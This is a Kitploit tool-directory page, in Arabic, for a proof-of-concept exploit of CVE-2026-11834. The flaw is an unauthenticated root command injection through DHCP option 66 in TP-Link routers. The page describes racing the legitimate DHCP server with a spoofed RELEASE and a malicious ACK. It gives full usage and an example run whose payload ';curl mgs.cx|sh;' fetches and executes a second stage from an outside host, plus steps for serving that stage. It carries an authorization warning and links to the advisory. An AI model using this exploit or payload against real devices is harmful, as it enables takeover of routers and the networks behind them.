Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-11834 — إثبات المفهوم (PoC) لثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) غير المصادق عليها عبر خيار DHCP 66 في أجهزة TP-Link (CVE-2026-11834) | Kitploit
أدوات/GitHubGitHub/mattgsys/cve-2026-11834
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubmattgsys/cve-2026-11834

CVE-2026-11834

إثبات المفهوم (PoC) لثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) غير المصادق عليها عبر خيار DHCP 66 في أجهزة TP-Link (CVE-2026-11834)

عرض المستودع
311منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-11834 (PoC)

ثغرة RCE غير مصادق عليها في خيار DHCP 66 بمنتجات TP-Link (CVE-2026-11834)

نظرة عامة

تسمح ثغرة حقن أوامر (CWE-78) في معالجة خيار DHCP 66 ("اسم خادم TFTP") في برنامج تشغيل أجهزة توجيه TP-Link لمهاجم غير مصادق عليه على نفس قطاع الشبكة بتنفيذ أوامر تعسفية بصلاحيات الجذر. عندما يعمل الجهاز كعميل DHCP على واجهة WAN، يتم دمج قيمة الخيار 66 المعادة في عقد الإيجار دون تطهير في أمر tftp داخل libcmm.so. تقوم خمس دوال ببناء هذا الأمر وتمريره إلى util_execSystem()، التي تستدعي system()، وبالتالي يتم تفسير قيمة الخيار 66 المصممة كمدخلات shell وتنفيذها بصلاحيات الجذر.

يتم اقتطاع قيمة الخيار 66 إلى 16 حرفاً على الجهاز، لذا تكون الحمولة عبارة عن أمر جلب وتنفيذ بسيط (;curl <domain>|sh;) يسحب مرحلة ثانية أكبر عبر HTTP.

لا يحتاج المهاجم إلى التحكم في خادم DHCP. يزاحم هذا الـPoC الخادم الشرعي على القطاع: فهو يزيف حزمة إطلاق RELEASE الخاصة بـ DHCP بالنيابة عن الهدف لمسح ارتباطه، وينتظر حتى يعيد الهدف الحصول على عقد الإيجار، ثم يرد على بث الهدف بحزمة OFFER/ خبيثة تحمل الحمولة قبل رد الخادم الشرعي.

ACK

تم اختبار إثبات المفهوم هذا (PoC) على جهاز TP-Link Archer C20 V6 (البرنامج الثابت 0.9.1 Build 4.19، إصدار EU). مسار الكود القابل للاستغلال مشترك عبر مجموعة من أجهزة توجيه TP-Link؛ قد تختلف إزاحات الذاكرة وعناوين الدوال والسلوك في الموديلات الأخرى أو إصدارات البرنامج الثابت الأخرى.

تحذير

يقوم إثبات المفهوم هذا بتسليم حمولة الخيار 66 التي يتم تنفيذها بصلاحيات الجذر على الجهاز الهدف. قم بتشغيل هذا فقط ضد أجهزة تملكها أو مخوّل صراحةً لاختبارها.

الاستخدام

root@kitploit:~
$ sudo python3 cve-2026-11834.py <target_ip> -i <interface> -s <dhcp_server_ip> -S <dhcp_server_mac> -p '<payload>'
الوسيطالوصف
target_ipعنوان IP الحالي للجهاز الهدف
-i, --interfaceواجهة الشبكة على قطاع الهدف
-s, --server-ipعنوان IP لخادم DHCP الشرعي
-S, --server-macعنوان MAC لخادم DHCP الشرعي
-p, --payloadقيمة الخيار 66 (<=16 حرفاً)، مثل `;curl
-t, --target-macعنوان MAC للهدف (يتم حله تلقائياً عبر ARP إذا تم حذفه)
-a, --attacker-ipمعرّف الخادم المُعلن في عقد الإيجار الخبيث (الافتراضي هو عنوان IP للواجهة)

مثال على التشغيل:

root@kitploit:~
$ sudo python3 cve-2026-11834.py 10.0.10.110 -i eth0 -s 10.0.10.254 -S 00:f2:8b:99:86:46 -p ';curl mgs.cx|sh;'

  TP-Link DHCP Option 66 Unauthenticated RCE (CVE-2026-11834) - Race Attack
  Target IP   : 10.0.10.110
  Target MAC  : 3c:64:cf:7b:69:8b
  DHCP Server : 10.0.10.254 (00:f2:8b:99:86:46)
  Attacker IP : 10.0.10.5
  Interface   : eth0
  Payload     : ;curl mgs.cx|sh;

[*] Sending spoofed DHCP RELEASE for 10.0.10.110
[*] RELEASE sent. Waiting for target to re-acquire lease...
[!] Got DHCP REQUEST from 3c:64:cf:7b:69:8b, XID: 0x43edad72
[>] Sending malicious DHCP ACK...
[>] ACK sent. Payload delivered.

يستضيف خادم الحمولة مرحلة ثانية يجلبها الجهاز وينفذها. على سبيل المثال:

root@kitploit:~
$ cat index.html

[second stage payload]

$ sudo python3 -m http.server 80

الروابط

  • الشرح الكامل: https://mattg.systems/posts/cve-2026-11834/
  • سجل CVE: https://www.cve.org/cverecord?id=CVE-2026-11834
  • نشرة أمان TP-Link: https://www.tp-link.com/uk/support/faq/5141/
تنزيل الأداة